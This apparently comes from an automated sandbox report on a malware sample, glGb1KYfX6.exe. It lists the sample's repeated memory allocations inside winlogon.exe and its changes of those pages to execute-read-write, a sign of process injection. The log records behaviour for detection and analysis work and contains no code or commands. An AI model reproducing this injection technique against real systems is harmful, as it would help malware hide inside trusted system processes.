Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CFF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D000000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D001000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D014000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D016000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D018000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D020000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D021000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D034000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D036000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D038000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D040000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D041000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D054000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D056000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D058000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D060000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D061000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D074000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D076000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D078000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D080000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D081000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D094000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D096000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D098000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0B8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0D8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D0F8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D100000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D101000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D114000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D116000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D118000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D120000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D121000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D134000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D136000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D138000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D140000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D141000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D154000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D156000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D158000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D160000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D161000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D174000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D176000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D178000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D180000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D181000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D194000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D196000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D198000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1B8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1D8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D1F8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D200000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D201000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D214000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D216000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D218000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D220000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D221000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D234000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D236000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D238000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D240000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D241000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D254000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D256000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D258000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D260000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D261000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D274000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D276000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D278000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D280000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D281000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D294000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D296000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D298000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2B8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2D8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D2F8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D301000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D314000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D316000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D318000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D321000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D334000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D336000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D338000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D341000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D354000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D356000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D358000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D361000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D374000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: D376000 protect: page read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: 400000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: 401000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: 414000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: 416000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: 418000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C940000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C941000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C954000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C956000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C958000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C960000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C961000 protect: page execute and read and writeJump to behavior
